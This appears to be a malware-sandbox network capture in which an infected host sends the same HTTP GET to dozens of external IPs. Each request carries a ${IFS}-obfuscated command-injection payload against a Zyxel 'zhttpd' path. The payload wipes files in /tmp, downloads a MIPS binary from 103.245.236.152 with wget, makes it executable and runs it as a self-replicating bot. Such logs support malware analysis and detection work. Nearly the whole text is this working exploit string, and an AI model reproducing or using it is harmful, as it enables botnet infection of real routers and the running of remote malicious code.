                                          Jan 14, 2024 15:46:28.270765066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7244192.168.2.2339876151.158.230.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270813942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7245192.168.2.234407037.194.254.18443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270837069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7246192.168.2.234809819.68.30.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270859957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7247192.168.2.2337842180.21.140.254443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270919085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7248192.168.2.2353018117.249.233.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270939112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7249192.168.2.235729283.60.106.213443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.270972013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7250192.168.2.2343992102.135.211.45443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271006107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7251192.168.2.2351922159.138.229.79443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271013975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7252192.168.2.2354936218.136.118.74443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271033049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7253192.168.2.235093814.241.20.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271070004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7254192.168.2.235357046.186.224.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271095037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7255192.168.2.2348744138.160.205.172443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271126986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7256192.168.2.2358516161.57.132.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271143913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7257192.168.2.2360534207.162.83.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271171093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7258192.168.2.2356030173.194.226.84443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271203041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7259192.168.2.2347156122.159.197.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271229029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7260192.168.2.2337022102.74.245.16443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271250963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7261192.168.2.234984412.179.94.149443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271287918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7262192.168.2.2351564178.78.244.52443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271332979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7263192.168.2.234925252.164.96.91443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271359921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7264192.168.2.2355626201.216.36.33443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271384954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7265192.168.2.2356200171.43.71.194443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271414042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7266192.168.2.2347586163.135.99.117443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271444082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7267192.168.2.233460267.105.114.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271495104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7268192.168.2.2334858193.189.48.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271507025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7269192.168.2.2350546191.248.100.243443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271536112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7270192.168.2.234327679.135.28.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271558046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7271192.168.2.2344038223.27.31.3443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271590948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7272192.168.2.23369828.73.227.251443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271590948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7273192.168.2.2356470163.95.180.130443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271617889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7274192.168.2.2341360158.176.213.232443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271652937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7275192.168.2.235447042.55.18.127443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271672964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7276192.168.2.2348956173.227.15.57443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271703005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7277192.168.2.2334126146.46.192.250443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271730900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7278192.168.2.233764883.42.195.31443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271749973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7279192.168.2.2347516223.56.48.223443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271783113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7280192.168.2.2336044111.210.22.61443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271823883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7281192.168.2.2343038120.229.175.190443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271837950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7282192.168.2.2338510197.252.163.1443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271883965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7283192.168.2.2353154220.205.68.30443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271922112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7284192.168.2.2333212121.149.68.228443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271943092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7285192.168.2.234216027.77.56.8443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.271977901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7286192.168.2.2337462142.26.252.168443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272001982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7287192.168.2.233452678.24.61.142443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272023916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7288192.168.2.2346812141.81.15.151443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272083044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7289192.168.2.234219224.223.120.2443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272106886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7290192.168.2.235756864.68.95.69443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272131920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7291192.168.2.235297881.135.126.221443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272173882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7292192.168.2.235923474.117.138.56443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272195101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7293192.168.2.2358720107.99.208.212443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272222996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7294192.168.2.2360678192.28.13.41443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272247076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7295192.168.2.234386432.61.225.26443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272257090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7296192.168.2.2353578163.69.229.29443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272278070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7297192.168.2.233881834.3.6.173443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272288084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7298192.168.2.233934223.27.88.187443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272310019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7299192.168.2.2348604202.235.115.193443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272347927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7300192.168.2.2349626151.247.109.184443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272382021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7301192.168.2.2359978175.206.121.105443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272407055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7302192.168.2.2343186218.254.188.128443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272442102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7303192.168.2.233393666.66.58.99443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272459030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7304192.168.2.2334246110.107.156.153443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272496939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7305192.168.2.235384251.46.109.240443
                                          TimestampBytes transferredDirectionData
                                          Jan 14, 2024 15:46:28.272543907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          7306192.168.2.2358130178.191.149.252443
                                          TimestampBytes transferredDirectionData
